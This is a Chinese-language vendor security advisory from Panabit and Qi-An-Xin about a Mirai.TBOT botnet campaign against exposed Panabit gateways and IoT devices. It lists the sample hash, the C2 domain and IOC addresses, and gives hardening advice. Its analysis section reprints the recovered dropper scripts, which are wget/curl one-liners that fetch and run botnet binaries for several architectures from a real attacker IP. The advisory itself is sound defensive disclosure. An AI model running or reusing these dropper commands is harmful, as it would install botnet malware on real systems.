我们与奇安信威胁情报中心共同监测到一系列针对包括Panabit设备在内的路由器、网关和IoT设备的网络攻击事件,攻击者利用了一些暴露在公网且安全设置不当的设备进行攻击,并借此进行了进一步的侵害行为。
派网受影响的设备,主要是设备管理平面暴露在公网,且为Panabit Linux x86 版本操作系统的设备。我们对此次事件高度重视,并迅速制定了一系列针对性的解决方案。
如您的设备遭受攻击,主要表现为管理口对外发起未识别的链接,请立即关闭所有外部映射,并在派网官方应用商店中下载安装“BadGuyClear” APP清除潜在问题并加固系统。
Panabit应用商店中可直接安装,如管理口未联网,可以访问Panabit官网下载中心获取APP文件手动安装
未受到此次攻击影响也推荐您安装相关APP达到系统加固之目的,防患于未然。采用补丁APP安装,与是否在升级服务期内无关,所有用户均可使用。
我们联合奇安信威胁情报中心对捕获的木马样本进行了分析,细节如下。
样本信息
文件名 | 文件大小 | 文件MD5 |
x86 | 35024 bytes | 2B792A5A5020BB9C578FF66373B61FDB |
木马CC通信
木马相关的域名和IP:
域名 | 绑定IP | 地理位置 | 解析量 | 注册时间 | 类型 |
bots.gxz.me | 185.196.8.107 |
木马细节
▎家族归属
通过对样本的分析确认该样本属于Mirai僵尸网络。
上线包未修改,与原始Mirai一致:
C2 = bots.gxz.me:
对应端口1985,为样本硬编码:
▎针对性
样本属于原始Mirai家族,并未发现针对性,经过关联分析,此次反馈的样本为9月版本,该版本中并未内置弱口令及EXP函数,仅包含了DDoS攻击模块:
而在关联的8月样本中,还包含了弱口令暴破及漏洞利用:
例如某路由器的CVE-2017-17215漏洞:
因此判断该团伙此次的传播通过外置的漏洞利用脚本进行扫描,扫描存在漏洞的设备并运行对应的恶意脚本文件,目前观测到两个版本的恶意脚本:
#x86 version被攻击设备内提取cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.196.8.107:4782/x86; curl -O http://185.196.8.107:4782/x86;chmod 777 *;./x86 qbit;rm -f x86*cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.196.8.107:4782/x86_64; curl -O http://185.196.8.107:4782/x86_64;chmod 777 *;./x86_64 qbit;rm -f x86_64*#MIPS ARM MPSL Version 病毒样本提取cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.196.8.107:4782/mips; curl -O http://185.196.8.107:4782/mips;chmod 777 *;./mips qbit;rm -f mips*cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.196.8.107:4782/mpsl; curl -O http://185.196.8.107:4782/mpsl;chmod 777 *;./mpsl qbit;rm -f mpsl*cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.196.8.107:4782/arm5; curl -O http://185.196.8.107:4782/arm5;chmod 777 *;./arm5 qbit;rm -f arm5*cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.196.8.107:4782/arm7; curl -O http://185.196.8.107:4782/arm7;chmod 777 *;./arm7 qbit;rm -f arm7*
相关团伙
通过对样本的特征进行关联分析,此次事件归属奇安信Xlab曾披露的Mirai.TBOT。
▶相关链接:
https://blog.xlab.qianxin.com/mirai-tbot-en/
对应的Mirai解密key及特征字符串均符合特征,并且事件也符合该团伙的规模:
IOCs
bots.gxz.me
185.196.8.107:4782
93.123.85.50:4782
141.98.7.43:8000
198.23.197.241
建议对以上域名和地址进行网络封堵,其中198.23.197.241为扫描投毒发起地址,有连接尝试不意味着攻击成功。
最后,再次强调,为加强安全防御,建议您采取以下安全措施:
1 ▶
关闭设备的管理口外部映射,确保您的管理接口不要暴露在外网。
2 ▶
为您的设备设置复杂密码,打开防火墙白名单,仅允许经过严格审核的IP地址访问管理界面。
3 ▶
推荐您使用官方云管平台(派网公有云SaaS平台)或私有化部署的云管平台,并开启二次认证功能,以进一步增强账户的安全性。
4 ▶
在Panabit应用商店安装“BadGuyClear” APP加固系统。
TIPS:
暴露公网是最大的传播来源,但是蠕虫病毒的一个特色就是横向移动,一旦内网中有一个可以访问外网的其他终端中了,它会进行内部扫描传播到其他设备。所以,不论公网内网,相关安全补丁APP都要求加载执行。
您可以通过400-773-3996技术服务热线、各省本地技术服务支持人员、Panabit官方网站、Panabit技术论坛以及其他便利的手段联系我们,我们将快速响应您的需求。我们会持续关注相关安全动向,助您解决问题。
最后,鸣谢奇安信威胁情报中心的大力协助,祝愿中秋快乐!
网络安全威胁情报生态联盟,英文全称:Cybersecurity Ecology Alliance of Threat Intelligence,简称:CEATI联盟。联盟是由奇安信威胁情报中心联手国内多个著名安全公司共同发起的共建威胁情报行业生态的联盟机构,依托于奇安信发布的“TI INSIDE计划”,将以威胁情报能力应用为核心,打造新生态圈模式,情报使能、共谋共策、开放合作、协作共赢。降低威胁情报的应用门槛,提升威胁情报使用效果以及体现最终客户侧的威胁情报价值,从而在整体上提高国内安全防护水平。
CEATI联盟目前已吸纳24家成员单位,能力涵盖情报运营、APT跟踪、样本对抗、Web安全、数据安全、大数据分析、云安全、等保合规安全硬件等多方面关键技术。未来将与各成员单位共同推动以威胁情报技术应用为核心的行业生态建设,实现行业内威胁情报信息共享、数据运营、情报分发、威胁情报消费的行业闭环,开展技术咨询、分析报告、情报赋能等商业合作。
往期精选
